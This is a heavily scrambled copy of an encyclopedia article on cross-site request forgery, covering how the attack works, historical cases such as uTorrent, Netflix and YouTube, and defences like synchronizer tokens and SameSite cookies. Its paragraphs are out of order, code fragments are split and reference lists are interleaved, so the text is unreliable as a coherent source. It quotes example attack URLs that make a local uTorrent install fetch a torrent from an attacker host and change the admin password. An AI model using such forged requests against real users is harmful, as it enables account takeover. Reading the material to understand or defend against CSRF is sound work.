113:
embedded on a page within the attacker's control. This link may be placed in such a way that it is not even necessary for the victim to click the link. For example, it may be embedded within an html image tag on an email sent to the victim which will automatically be loaded when the victim opens their email. Once the victim has clicked the link, their browser will automatically include any cookies used by that website and submit the request to the web server. The web server will not be able to identify the forgery because the request was made by a user that was logged in, and submitted all the requisite cookies.
533:
204:
69:(XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser. In a CSRF attack, an innocent end user is tricked by an attacker into submitting a web request that they did not intend. This may cause actions to be performed on the website that can include inadvertent client or server data leakage, change of session state, or manipulation of an end user's account.
854:) can prevent CSRF by providing a default-deny policy for cross-site requests. However, this can significantly interfere with the normal operation of many websites. The CsFire extension (also for Firefox) can mitigate the impact of CSRF with less impact on normal browsing, by removing authentication information from cross-site requests.
108:
A general property of web browsers is that they will automatically and invisibly include any cookies (including session cookies and others) used by a given domain in any web request sent to that domain. This property is exploited by CSRF attacks. In the event that a user is tricked into inadvertently
685:
STP is the most compatible as it only relies on HTML, but introduces some complexity on the server side, due to the burden associated with checking validity of the token on each request. As the token is unique and unpredictable, it also enforces proper sequence of events (e.g. screen 1, then 2, then
623:
or other bug at the target website. Similarly, the attacker can only target any links or submit any forms that come up after the initial forged request if those subsequent links or forms are similarly predictable. (Multiple targets can be simulated by including multiple images on a page, or by using
312:
In particular, the convention has been established that the GET and HEAD methods SHOULD NOT have the significance of taking an action other than retrieval. These methods ought to be considered "safe". This allows user agents to represent other methods, such as POST, PUT and DELETE, in a special way,
821:
Similarly to the cookie-to-header approach, but without involving JavaScript, a site can set a CSRF token as a cookie, and also insert it as a hidden field in each HTML form. When the form is submitted, the site can check that the cookie token matches the form token. The same-origin policy prevents
194:
New attacks against web-enabled devices were carried out in 2018, including attempts to change the DNS settings of routers. Some router manufacturers hurriedly released firmware updates to improve protection, and advised users to change router settings to reduce the risk. Details were not released,
80:
In a CSRF attack, the attacker's goal is to cause an innocent victim to unknowingly submit a maliciously crafted web request to a website that the victim has privileged access to. This web request can be crafted to include URL parameters, cookies and other data that appear normal to the web server
861:
extension for
Firefox mitigates CSRF threats by distinguishing trusted from untrusted sites, and removing authentication & payloads from POST requests sent by untrusted sites to trusted ones. The Application Boundary Enforcer module in NoScript also blocks requests sent from internet pages to
215:
Attackers who can find a reproducible link that executes a specific action on the target page while the victim is logged in can embed such link on a page they control and trick the victim into opening it. The attack carrier link may be placed in a location that the victim is likely to visit while
833:
An additional "SameSite" attribute can be included when the server sets a cookie, instructing the browser on whether to attach the cookie to cross-site requests. If this attribute is set to "strict", then the cookie will only be sent on same-site requests, making CSRF ineffective. However, this
109:
submitting a request through their browser these automatically included cookies will cause the forged request to appear real to the web server and it will perform any appropriately requested actions including returning data, manipulating session state, or making changes to the victim's account.
491:
or other vulnerabilities, or guessed via a brute-force attack, rendered on a malicious page that generates thousands of failed requests. The attack class of "Dynamic CSRF", or using a per-client payload for session-specific forgery, was described in 2009 by Nathan Hamiel and Shawn Moyer at the
112:
In order for a CSRF attack to work, an attacker must identify a reproducible web request that executes a specific action such as changing an account password on the target page. Once such a request is identified, a link can be created that generates this malicious request and that link can be
733:
running on the client side of an HTTPS connection to the server that initially set the cookie will be able to read the cookie's value. JavaScript running from a rogue file or email should not be able to successfully read the cookie value to copy into the custom header. Even though the
292:
for that domain. This general property of web browsers enables CSRF attacks to exploit their targeted vulnerabilities and execute hostile actions as long as the user is logged into the target website (in this example, the local uTorrent web interface) at the time of the attack.
169:
website in 2006 had numerous vulnerabilities to CSRF, which could have allowed an attacker to perform actions such as adding a DVD to the victim's rental queue, changing the shipping address on the account, or altering the victim's login credentials to fully compromise the
341:. Login CSRF makes various novel attacks possible; for instance, an attacker can later log into the site with their legitimate credentials and view private information like activity history that has been saved in the account. This attack has been demonstrated against
643:(STP) is a technique where a token, a secret and unique value for each request, is embedded by the web application in all HTML forms and verified on the server side. The token may be generated by any method that ensures unpredictability and uniqueness (e.g. using a
611:
The attacker must determine the right values for all the forms or URL inputs; if any of them are required to be secret authentication values or IDs that the attacker can't guess, the attack will most likely fail (unless the attacker is extremely lucky in their
1481:
261:, so that browsers visiting these pages would open them automatically, without much user action. People running vulnerable uTorrent version at the same time as opening these pages were susceptible to the attack.
1425:
865:
The Self
Destructing Cookies extension for Firefox does not directly protect from CSRF, but can reduce the attack window, by deleting cookies as soon as they are no longer associated with an open tab.
702:
On an initial visit without an associated server session, the web application sets a cookie. The cookie typically contains a random token which may remain the same for up to the life of the web session
1361:
939:. Filtering out unexpected GET requests still prevents some particular attacks, such as cross-site attacks using malicious image URLs or link addresses and cross-site information leakage through
487:
worm, or constructed on the fly from session information leaked via offsite content and sent to a target as a malicious URL. CSRF tokens could also be sent to a client by an attacker due to
608:
The attacker must find a form submission at the target site, or a URL that has side effects, that does something (e.g., transfers money, or changes the victim's e-mail address or password).
908:
to see if the request is coming from an authorized page is commonly used for embedded network devices because it does not increase memory requirements. However, a request that omits the
72:
The term "CSRF" is also used as an abbreviation in defences against CSRF attacks, such as techniques that use header data, form data, or cookies, to test for and prevent such attacks.
935:
was for a while perceived as immune to trivial CSRF attacks using parameters in URL (using GET method). However, both POST and any other HTTP method can be now easily executed using
632:
Most CSRF prevention techniques work by embedding additional authentication data into requests that allows the web application to detect requests from unauthorized locations.
640:
924:
header for privacy reasons. Also, old versions of Flash (before 9.0.18) allow malicious Flash to generate GET or POST requests with arbitrary HTTP request headers using
1671:
1422:
647:
of random seed). This is called a anti-forgery token in ASP.NET. The attacker is thus unable to place a correct token in their requests to authenticate them.
161:, some website logs might not have evidence of CSRF. Exploits are under-reported, at least publicly, and as of 2007 there were few well-documented examples:
58:
that the web application trusts. There are many ways in which a malicious website can transmit such commands; specially-crafted image tags, hidden forms, and
1641:
495:
A new vector for composing dynamic CSRF attacks was presented by Oren Ofer at a local OWASP chapter meeting in
January 2012 β "AJAX Hammer β Dynamic CSRF".
1386:
686:
3) which raises usability problem (e.g. user opens multiple tabs). It can be relaxed by using per session CSRF token instead of per request CSRF token.
619:
The attack is blind: the attacker cannot see what the target website sends back to the victim in response to the forged requests, unless they exploit a
706:
Set-Cookie: __Host-csrf_token=i8XNjC4b8KVok4uw5RftR38Wgp2BFwql; Expires=Thu, 23-Jul-2015 10:25:33 GMT; Max-Age=31449600; Path=/; SameSite=Lax; Secure
1738:
1406:
1322:
962:(XSS) vulnerabilities (even in other applications running on the same domain) allow attackers to bypass essentially all CSRF preventions.
554:
1531:
479:
Additionally, while typically described as a static type of attack, CSRF can also be dynamically constructed as part of a payload for a
1768:
1748:
1566:
1131:
1711:
388:, that is, not significantly changing user's state in the application. Applications using GET for such operations should switch to
1252:
1185:
741:
may be automatically sent with the rogue request, subject to the cookies SameSite policy, the server will still expect a valid
1591:
1235:
157:
CSRF Token vulnerabilities have been known and in some cases exploited since 2001. Because it is carried out from the user's
337:
An attacker may forge a request to log the victim into a target website using the attacker's credentials; this is known as
1668:
825:
The advantage of this technique over the
Synchronizer pattern is that the token does not need to be stored on the server.
822:
an attacker from reading or setting cookies on the target domain, so they cannot put a valid token in their crafted form.
361:
120:
against a web browser because the web browser is tricked into submitting a forged request by a less privileged attacker.
1552:
1507:
751:
The CSRF token itself should be unique and unpredictable. It may be generated randomly, or it may be derived from the
385:
1076:
580:
190:
was also vulnerable to CSRF and it allowed attackers to change their company system. This is fixed in newer versions.
615:
The attacker must lure the victim to a web page with malicious code while the victim is logged into the target site.
562:
296:
In the uTorrent example described above, the attack was facilitated by the fact that uTorrent's web interface used
466:(CORS) preventing CSRF; these measures however will not be active on websites that explicitly disable them using
208:
1763:
1390:
558:
145:
1655:
1627:
463:
434:
184:
was also vulnerable to CSRF in 2008 and this allowed any attacker to perform nearly all actions of any user.
928:. Similar CRLF injection vulnerabilities in a client can be used to spoof the referrer of an HTTP request.
1403:
1210:
358:
43:
1319:
862:
local sites (e.g. localhost), preventing CSRF attacks on local services (such as uTorrent) or routers.
65:
or XMLHttpRequests, for example, can all work without the user's interaction or even knowledge. Unlike
1749:
Cross-Site
Request Forgery from The Web Application Security Consortium Threat Classification Project
516:
1302:
543:
368:). Therefore, the protective measures against an attack depend on the method of the HTTP request.
364:
vary in their susceptibility to the CSRF attacks (due to the differences in their handling by the
1068:
976:
925:
547:
225:
62:
886:
851:
777:
651:
329:, but rather apply the protection only to HTTP methods that are intended to be state-changing.
1628:"Cross-domain policy file usage recommendations for Flash Player - Adobe Developer Connection"
381:
254:
504:
1060:
1035:
313:
so that the user is made aware of the fact that a possibly unsafe action is being requested.
1006:
959:
620:
480:
66:
1570:
1138:
8:
1715:
1440:
300:
for critical state-changing operations (change credentials, download a file etc.), which
280:
http://localhost:8080/gui/?action=add-url&s=http://evil.example.com/backdoor.torrent
16:
Malicious website exploit where unauthorized commands are transmitted from a trusted user
1612:
1163:
243:
http://localhost:8080/gui/?action=add-url&s=http://evil.example.com/backdoor.torrent
1061:
796:
459:
430:
1338:
1092:
873:
Various other techniques have been used or proposed for CSRF prevention historically:
93:(e.g. via a popup confirmation) the specific action. A user who is authenticated by a
1072:
784:. Because the token remains constant over the whole user session, it works well with
1001:
952:
602:
512:
488:
301:
55:
1278:
376:
the CSRF exploitation is trivial, using methods described above, such as a simple
1675:
1429:
1410:
1326:
1093:"What is Cross-Site Request Forgery (CSRF) and How Does It Work? | Synopsys"
843:
508:
249:
http://localhost:8080/gui/?action=setsetting&s=webui.password&v=eviladmin
128:
117:
82:
51:
1468:"Vulnerability Note VU#264385 - OpenCA allows Cross site request forgery (XSRF)"
791:
The protection provided by this technique can be thwarted if the target website
698:
for the majority of their operations may use the following anti-CSRF technique:
503:
Severity metrics have been issued for CSRF token vulnerabilities that result in
305:
1307:
Proceedings of the 15th ACM Conference on
Computer and Communications Security,
936:
932:
752:
455:
426:
265:
86:
788:
applications, but does not enforce sequence of events in the web application.
1757:
996:
991:
986:
882:
847:
598:
449:
content type, but if this is not enforced on the server, CSRF can be executed
318:
216:
logged into the target site (for example, a discussion forum), or sent in an
105:
request to a site that trusts the user and thereby cause an unwanted action.
90:
1106:
912:
header must be treated as unauthorized because an attacker can suppress the
445:
attribute; such a fake request can be distinguished from legitimate ones by
1743:
901:
403:
232::8080 allowed critical actions to be executed using a simple GET request:
948:
834:
requires the browser to recognise and correctly implement the attribute.
714:
713:
operating on the client side reads its value and copies it into a custom
593:
Several things have to happen for cross-site request forgery to succeed:
438:
411:
365:
326:
297:
289:
98:
94:
1688:
1467:
1453:
492:
BlackHat
Briefings, though the taxonomy has yet to gain wider adoption.
317:
Because of this assumption, many existing CSRF prevention mechanisms in
1279:"Cross Site Request Forgery protection | Django documentation | Django"
770:
730:
710:
695:
644:
484:
269:
258:
217:
174:
158:
59:
1132:"Cross Site Request Forgery: An Introduction To A Common Web Weakness"
781:
437:(CORS); there is a technique to send arbitrary content from a simple
396:
389:
377:
229:
177:
was vulnerable to a CSRF attack that allowed illicit money transfers.
1107:"What is CSRF (Cross-site request forgery)? Tutorial & Examples"
947:); it also prevents (non-security-related) problems with aggressive
532:
284:
When accessing the attack link to the local uTorrent application at
203:
920:
validation may cause issues with browsers or proxies that omit the
858:
766:
373:
237:
221:
1441:
Downloads β hasc-research β hasc-research β Google
Project Hosting
141:
requests to a target site where the user is already authenticated.
776:
This technique is implemented by many modern frameworks, such as
380:
containing manipulated parameters and automatically loaded by an
181:
166:
47:
1161:
729:
Security of this technique is based on the assumption that only
288:, the browser would also always automatically send any existing
1339:"Cross-Site Request Forgery For POST Requests With An XML Body"
971:
916:
header by issuing requests from FTP or HTTPS URLs. This strict
454:
other HTTP methods (PUT, DELETE etc.) can only be issued using
342:
273:
187:
1423:
Israel 2012/01: AJAX Hammer β Harnessing AJAX for CSRF Attacks
1208:
597:
The attacker must target either a site that doesn't check the
1553:"Valhalla Articles - Cross-Site Request Forgery: Demystified"
981:
384:. By the HTTP specification however, GET should be used as a
346:
253:
Attacks were launched by placing malicious, automatic-action
1454:"Vulnerability Note VU#584089 - cPanel XSRF vulnerabilities"
1211:"Cross-Site Request Forgeries: Exploitation and Prevention"
785:
756:
418:
138:
102:
1532:"Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet"
422:
1443:. Code.google.com (2013-06-17). Retrieved on 2014-04-12.
725:
The server validates presence and integrity of the token
228:) exploited the fact that its web console accessible at
1164:"Vulnerability Type Distributions in CVE (version 1.1)"
806:
file granting unintended access to
Silverlight controls
1739:
A Most-Neglected Fact About Cross Site
Request Forgery
1613:"Making a Service Available Across Domain Boundaries"
762:
csrf_token = HMAC(session_token, application_secret)
425:) a standard method is to issue a POST request using
399:
vulnerability to CSRF depends on the usage scenario:
85:
that perform actions based on input from trusted and
1508:"CSRF: Cross-site request forgery attacks explained"
1253:"Security Advisory: CSRF & DNS/DHCP/Web Attacks"
1137:. Information Security Partners, LLC. Archived from
1362:"Web 2.0 Hacking Defending Ajax & Web Services"
1183:
1162:Christey, Steve; Martin, Robert A. (May 22, 2007).
410:) CSRF attack is easily implemented using a simple
1301:Adam Barth, Collin Jackson, and John C. Mitchell,
264:CSRF attacks using image tags are often made from
1209:William Zeller; Edward W. Felten (October 2008).
624:JavaScript to introduce a delay between clicks.)
601:or a victim with a browser or plugin that allows
511:as well as a vulnerability that can compromise a
268:, where users are allowed to post images but not
220:body or attachment. A real CSRF vulnerability in
123:CSRF commonly has the following characteristics:
54:where unauthorized commands are submitted from a
1755:
402:In simplest form of POST with data encoded as a
1320:Passive monitoring login request forgery, Yahoo
1186:"Netflix fixes cross-site request forgery hole"
1036:"Security Corner: Cross-Site Request Forgeries"
1033:
812:file granting unintended access to Flash movies
721:X-Csrf-Token: i8XNjC4b8KVok4uw5RftR38Wgp2BFwql
1678:. People.mozilla.org. Retrieved on 2013-07-29.
1592:"Cross Site Request Forgery (XSRF) Protection"
1303:Robust Defenses for Cross-Site Request Forgery
842:Browser extensions such as RequestPolicy (for
134:It exploits the site's trust in that identity.
116:Cross-site request forgery is an example of a
877:Verifying that the request's headers contain
635:
1359:
1233:
1129:
1058:
828:
677:"KbyUmhTLMpYj7CD2di7JKP1P3qmLlkPt"
561:. Unsourced material may be challenged and
474:
1029:
1027:
1025:
1023:
1021:
137:It tricks the user's browser into sending
837:
689:
581:Learn how and when to remove this message
332:
1545:
1204:
1202:
1184:Washkuch Jr., Frank (October 17, 2006).
1054:
1052:
202:
127:It involves sites that rely on a user's
1567:"Cross Site Request Forgery protection"
1482:"Enhanced cross-site attack prevention"
1085:
1038:. php|architect (via shiflett.org)
1018:
816:
799:using one of the following techniques:
414:and anti-CSRF measures must be applied.
1756:
769:flag, as it is intended to be read by
352:
246:Change uTorrent administrator password
173:The online banking web application of
1709:
1524:
1199:
1049:
1034:Shiflett, Chris (December 13, 2004).
889:before v1.2.5), or checking the HTTP
417:If data is sent in any other format (
1387:"Security Fix - Weaponizing Web 2.0"
1123:
765:The CSRF token cookie must not have
717:sent with each transactional request
559:adding citations to reliable sources
526:
515:, which will completely undermine a
211:page describing a CSRF vulnerability
144:It involves HTTP requests that have
89:users without requiring the user to
81:processing the request. At risk are
1625:
1227:
868:
846:) or uMatrix (for both Firefox and
195:citing "obvious security reasons".
13:
1744:The Cross-Site Request Forgery FAQ
1312:
75:
14:
1780:
1769:Client-side web security exploits
1732:
1480:
531:
1703:
1681:
1662:
1648:
1634:
1619:
1605:
1584:
1559:
1500:
1474:
1460:
1446:
1434:
1415:
1397:
1379:
1353:
1331:
1295:
1271:
1245:
671:"csrfmiddlewaretoken"
483:attack, as demonstrated by the
429:with CSRF attacks prevented by
408:field1=value1&field2=value2
209:National Vulnerability Database
1642:"Double Submit Cookie defence"
1177:
1155:
1099:
522:
468:Access-Control-Allow-Origin: *
1:
1236:"CSRF: Yeah, It Still Worksβ¦"
1012:
627:
464:Cross-origin resource sharing
435:Cross-origin resource sharing
392:or use anti-CSRF protection.
7:
965:
357:Depending on the type, the
10:
1785:
1712:"CSRF and same-origin XSS"
1691:. Secunia. 19 October 2006
1689:"Secunia Advisory SA22467"
1067:. O'Reilly Media. p.
694:Web applications that use
641:Synchronizer token pattern
636:Synchronizer token pattern
498:
198:
152:
101:could unknowingly send an
20:Cross-site request forgery
1658:. Mozilla. 10 April 2023.
829:SameSite cookie attribute
517:public key infrastructure
42:, is a type of malicious
1569:. Django. Archived from
1488:. European Patent Office
656:
475:Other approaches to CSRF
308:explicitly discourages:
278:
977:Confused deputy problem
1710:Schneider, Christian.
1669:Origin Header Proposal
1283:docs.djangoproject.com
838:Client-side safeguards
804:clientaccesspolicy.xml
690:Cookie-to-header token
650:Example of STP set by
333:Forging login requests
315:
212:
180:Popular video website
118:confused deputy attack
34:(sometimes pronounced
1764:Web security exploits
1360:Sheeraj Shah (2008).
1234:Mike, Bailey (2009).
1130:Burns, Jesse (2005).
1059:Ristic, Ivan (2005).
505:remote code execution
310:
206:
1007:Application security
960:Cross-site scripting
945:JavaScript hijacking
817:Double Submit Cookie
621:cross-site scripting
555:improve this section
481:cross-site scripting
272:, for example using
97:saved in the user's
67:cross-site scripting
1166:. MITRE Corporation
893:header and/or HTTP
353:HTTP verbs and CSRF
255:HTML image elements
30:and abbreviated as
1674:2016-03-08 at the
1656:"SameSite cookies"
1512:IONOS Digitalguide
1428:2013-10-01 at the
1409:2010-02-13 at the
1325:2014-12-22 at the
797:same-origin policy
665:"hidden"
460:Same-origin policy
431:Same-origin policy
213:
591:
590:
583:
1776:
1727:
1726:
1724:
1723:
1714:. Archived from
1707:
1701:
1700:
1698:
1696:
1685:
1679:
1666:
1660:
1659:
1652:
1646:
1645:
1638:
1632:
1631:
1626:Adamski, Lucas.
1623:
1617:
1616:
1609:
1603:
1602:
1600:
1599:
1588:
1582:
1581:
1579:
1578:
1563:
1557:
1556:
1549:
1543:
1542:
1540:
1539:
1528:
1522:
1521:
1519:
1518:
1504:
1498:
1497:
1495:
1493:
1478:
1472:
1471:
1464:
1458:
1457:
1450:
1444:
1438:
1432:
1419:
1413:
1401:
1395:
1394:
1393:on May 28, 2012.
1389:. Archived from
1383:
1377:
1376:
1374:
1372:
1366:
1357:
1351:
1350:
1348:
1346:
1335:
1329:
1316:
1310:
1299:
1293:
1292:
1290:
1289:
1275:
1269:
1268:
1266:
1264:
1249:
1243:
1242:
1240:
1231:
1225:
1224:
1222:
1220:
1215:
1206:
1197:
1196:
1194:
1193:
1181:
1175:
1174:
1172:
1171:
1159:
1153:
1152:
1150:
1149:
1143:
1136:
1127:
1121:
1120:
1118:
1117:
1103:
1097:
1096:
1089:
1083:
1082:
1066:
1056:
1047:
1046:
1044:
1043:
1031:
1002:Session fixation
953:link prefetching
942:
923:
919:
915:
911:
905:
896:
892:
885:before v2.0 and
880:
879:X-Requested-With
869:Other techniques
811:
805:
744:
737:
681:
678:
675:
672:
669:
666:
663:
660:
654:in a HTML form:
603:referer spoofing
586:
579:
575:
572:
566:
535:
527:
513:root certificate
489:session fixation
469:
448:
444:
409:
287:
83:web applications
24:one-click attack
22:, also known as
1784:
1783:
1779:
1778:
1777:
1775:
1774:
1773:
1754:
1753:
1735:
1730:
1721:
1719:
1708:
1704:
1694:
1692:
1687:
1686:
1682:
1676:Wayback Machine
1667:
1663:
1654:
1653:
1649:
1640:
1639:
1635:
1624:
1620:
1611:
1610:
1606:
1597:
1595:
1590:
1589:
1585:
1576:
1574:
1565:
1564:
1560:
1551:
1550:
1546:
1537:
1535:
1530:
1529:
1525:
1516:
1514:
1506:
1505:
1501:
1491:
1489:
1479:
1475:
1466:
1465:
1461:
1452:
1451:
1447:
1439:
1435:
1430:Wayback Machine
1420:
1416:
1411:Wayback Machine
1402:
1398:
1385:
1384:
1380:
1370:
1368:
1364:
1358:
1354:
1344:
1342:
1341:. pentestmonkey
1337:
1336:
1332:
1327:Wayback Machine
1318:Joseph Foulds,
1317:
1313:
1300:
1296:
1287:
1285:
1277:
1276:
1272:
1262:
1260:
1251:
1250:
1246:
1238:
1232:
1228:
1218:
1216:
1213:
1207:
1200:
1191:
1189:
1182:
1178:
1169:
1167:
1160:
1156:
1147:
1145:
1141:
1134:
1128:
1124:
1115:
1113:
1111:portswigger.net
1105:
1104:
1100:
1091:
1090:
1086:
1079:
1063:Apache Security
1057:
1050:
1041:
1039:
1032:
1019:
1015:
968:
940:
921:
917:
913:
909:
903:
894:
890:
878:
871:
844:Mozilla Firefox
840:
831:
819:
810:crossdomain.xml
809:
803:
763:
742:
735:
722:
707:
692:
683:
682:
679:
676:
673:
670:
667:
664:
661:
658:
638:
630:
599:referrer header
587:
576:
570:
567:
552:
536:
525:
509:root privileges
501:
477:
467:
446:
442:
407:
362:request methods
355:
335:
285:
282:
281:
266:Internet forums
201:
155:
78:
76:Characteristics
52:web application
17:
12:
11:
5:
1782:
1772:
1771:
1766:
1752:
1751:
1746:
1741:
1734:
1733:External links
1731:
1729:
1728:
1702:
1680:
1661:
1647:
1633:
1618:
1604:
1583:
1558:
1544:
1523:
1499:
1473:
1459:
1445:
1433:
1414:
1396:
1378:
1352:
1330:
1311:
1294:
1270:
1244:
1226:
1198:
1176:
1154:
1122:
1098:
1084:
1077:
1048:
1016:
1014:
1011:
1010:
1009:
1004:
999:
994:
989:
984:
979:
974:
967:
964:
957:
956:
941:<script>
937:XMLHttpRequest
933:request method
929:
926:CRLF Injection
898:
870:
867:
839:
836:
830:
827:
818:
815:
814:
813:
807:
761:
727:
726:
720:
719:
718:
705:
704:
703:
691:
688:
657:
637:
634:
629:
626:
617:
616:
613:
609:
606:
589:
588:
539:
537:
530:
524:
521:
500:
497:
476:
473:
472:
471:
456:XMLHttpRequest
452:
451:
450:
427:XMLHttpRequest
415:
393:
354:
351:
334:
331:
319:web frameworks
286:localhost:8080
279:
257:on forums and
251:
250:
247:
244:
241:
200:
197:
192:
191:
185:
178:
171:
154:
151:
150:
149:
142:
135:
132:
77:
74:
28:session riding
15:
9:
6:
4:
3:
2:
1781:
1770:
1767:
1765:
1762:
1761:
1759:
1750:
1747:
1745:
1742:
1740:
1737:
1736:
1718:on 2012-08-14
1717:
1713:
1706:
1690:
1684:
1677:
1673:
1670:
1665:
1657:
1651:
1643:
1637:
1629:
1622:
1614:
1608:
1593:
1587:
1573:on 2015-01-20
1572:
1568:
1562:
1554:
1548:
1533:
1527:
1513:
1509:
1503:
1487:
1483:
1477:
1469:
1463:
1455:
1449:
1442:
1437:
1431:
1427:
1424:
1418:
1412:
1408:
1405:
1400:
1392:
1388:
1382:
1363:
1356:
1340:
1334:
1328:
1324:
1321:
1315:
1308:
1304:
1298:
1284:
1280:
1274:
1258:
1254:
1248:
1237:
1230:
1212:
1205:
1203:
1188:. SC Magazine
1187:
1180:
1165:
1158:
1144:on 2013-01-21
1140:
1133:
1126:
1112:
1108:
1102:
1094:
1088:
1080:
1078:0-596-00724-8
1074:
1070:
1065:
1064:
1055:
1053:
1037:
1030:
1028:
1026:
1024:
1022:
1017:
1008:
1005:
1003:
1000:
998:
997:Replay attack
995:
993:
992:Heap spraying
990:
988:
987:Web Messaging
985:
983:
980:
978:
975:
973:
970:
969:
963:
961:
954:
950:
946:
938:
934:
930:
927:
907:
900:Checking the
899:
888:
884:
883:Ruby on Rails
876:
875:
874:
866:
863:
860:
855:
853:
849:
848:Google Chrome
845:
835:
826:
823:
808:
802:
801:
800:
798:
794:
789:
787:
783:
779:
774:
772:
768:
760:
758:
754:
753:session token
749:
747:
740:
732:
724:
723:
716:
712:
709:
708:
701:
700:
699:
697:
687:
655:
653:
648:
646:
642:
633:
625:
622:
614:
610:
607:
604:
600:
596:
595:
594:
585:
582:
574:
564:
560:
556:
550:
549:
545:
540:This section
538:
534:
529:
528:
520:
518:
514:
510:
506:
496:
493:
490:
486:
482:
465:
461:
457:
453:
440:
436:
432:
428:
424:
420:
416:
413:
405:
401:
400:
398:
394:
391:
387:
383:
379:
375:
371:
370:
369:
367:
363:
360:
350:
348:
344:
340:
330:
328:
324:
320:
314:
309:
307:
303:
299:
294:
291:
277:
275:
271:
267:
262:
260:
256:
248:
245:
242:
240:file download
239:
235:
234:
233:
231:
227:
226:CVE-2008-6586
223:
219:
210:
205:
196:
189:
188:McAfee Secure
186:
183:
179:
176:
172:
168:
164:
163:
162:
160:
147:
143:
140:
136:
133:
130:
126:
125:
124:
121:
119:
114:
110:
106:
104:
100:
96:
92:
88:
87:authenticated
84:
73:
70:
68:
64:
61:
57:
53:
49:
45:
41:
37:
33:
29:
25:
21:
1720:. Retrieved
1716:the original
1705:
1695:11 September
1693:. Retrieved
1683:
1664:
1650:
1636:
1621:
1607:
1596:. Retrieved
1586:
1575:. Retrieved
1571:the original
1561:
1547:
1536:. Retrieved
1526:
1515:. Retrieved
1511:
1502:
1490:. Retrieved
1485:
1476:
1462:
1448:
1436:
1417:
1404:Dynamic CSRF
1399:
1391:the original
1381:
1371:September 4,
1369:. Retrieved
1355:
1345:September 4,
1343:. Retrieved
1333:
1314:
1306:
1297:
1286:. Retrieved
1282:
1273:
1261:. Retrieved
1256:
1247:
1229:
1217:. Retrieved
1190:. Retrieved
1179:
1168:. Retrieved
1157:
1146:. Retrieved
1139:the original
1125:
1114:. Retrieved
1110:
1101:
1087:
1062:
1040:. Retrieved
958:
949:web crawlers
944:
872:
864:
856:
841:
832:
824:
820:
792:
790:
775:
764:
750:
745:
743:X-Csrf-Token
738:
728:
693:
684:
649:
639:
631:
618:
592:
577:
568:
553:Please help
541:
502:
494:
478:
404:query string
366:web browsers
356:
338:
336:
327:GET requests
322:
316:
311:
295:
283:
263:
252:
214:
193:
156:
146:side effects
122:
115:
111:
107:
79:
71:
39:
35:
31:
27:
23:
19:
18:
1594:. AngularJS
1492:21 November
1421:Owasp.org:
773:by design.
715:HTTP header
523:Limitations
386:safe method
298:GET request
99:web browser
1758:Categories
1722:2012-04-21
1598:2015-01-20
1577:2015-01-20
1538:2019-07-19
1517:2022-04-26
1288:2015-08-21
1259:. May 2018
1192:2019-02-11
1170:2008-06-07
1148:2011-12-12
1116:2019-11-04
1042:2008-07-03
1013:References
943:elements (
771:JavaScript
736:csrf-token
731:JavaScript
711:JavaScript
696:JavaScript
645:hash chain
628:Prevention
462:(SOP) and
447:text/plain
433:(SOP) and
339:login CSRF
270:JavaScript
259:email spam
218:HTML email
175:ING Direct
159:IP address
60:JavaScript
1486:Espacenet
1241:. DEFCON.
881:(used by
782:AngularJS
659:<input
542:does not
439:HTML form
412:HTML form
397:HTTP POST
390:HTTP POST
378:hyperlink
230:localhost
91:authorize
1672:Archived
1644:. OWASP.
1426:Archived
1407:Archived
1323:Archived
1309:ACM 2008
966:See also
859:NoScript
852:Chromium
793:disables
767:httpOnly
571:May 2018
374:HTTP GET
238:.torrent
236:Force a
222:uTorrent
170:account.
129:identity
36:sea-surf
1534:. OWASP
1257:Draytek
922:Referer
918:Referer
914:Referer
910:Referer
904:Referer
897:header.
891:Referer
612:guess).
563:removed
548:sources
499:Effects
443:ENCTYPE
382:IMG tag
290:cookies
199:Example
182:YouTube
167:Netflix
153:History
48:website
44:exploit
1367:. HITB
1263:18 May
1219:29 May
1075:
972:BREACH
906:header
895:Origin
887:Django
778:Django
755:using
746:header
739:cookie
674:value=
652:Django
470:header
441:using
343:Google
325:cover
304:
274:BBCode
95:cookie
1365:(PDF)
1239:(PDF)
1214:(PDF)
1142:(PDF)
1135:(PDF)
982:CRIME
931:POST
902:HTTP
680:/>
668:name=
662:type=
507:with
458:with
347:Yahoo
321:will
63:fetch
46:of a
38:) or
1697:2012
1494:2019
1373:2015
1347:2015
1265:2018
1221:2015
1073:ISBN
951:and
857:The
795:its
786:AJAX
780:and
757:HMAC
546:any
544:cite
485:Samy
419:JSON
395:the
359:HTTP
345:and
306:2616
165:The
139:HTTP
103:HTTP
56:user
40:XSRF
32:CSRF
1069:280
557:by
423:XML
372:In
323:not
302:RFC
50:or
26:or
1760::
1510:.
1484:.
1305:,
1281:.
1255:.
1201:^
1109:.
1071:.
1051:^
1020:^
759::
748:.
519:.
421:,
349:.
276::
207:A
1725:.
1699:.
1630:.
1615:.
1601:.
1580:.
1555:.
1541:.
1520:.
1496:.
1470:.
1456:.
1375:.
1349:.
1291:.
1267:.
1223:.
1195:.
1173:.
1151:.
1119:.
1095:.
1081:.
1045:.
955:.
850:/
605:.
584:)
578:(
573:)
569:(
565:.
551:.
406:(
224:(
148:.
131:.
Text is available under the Creative Commons Attribution-ShareAlike License. Additional terms may apply.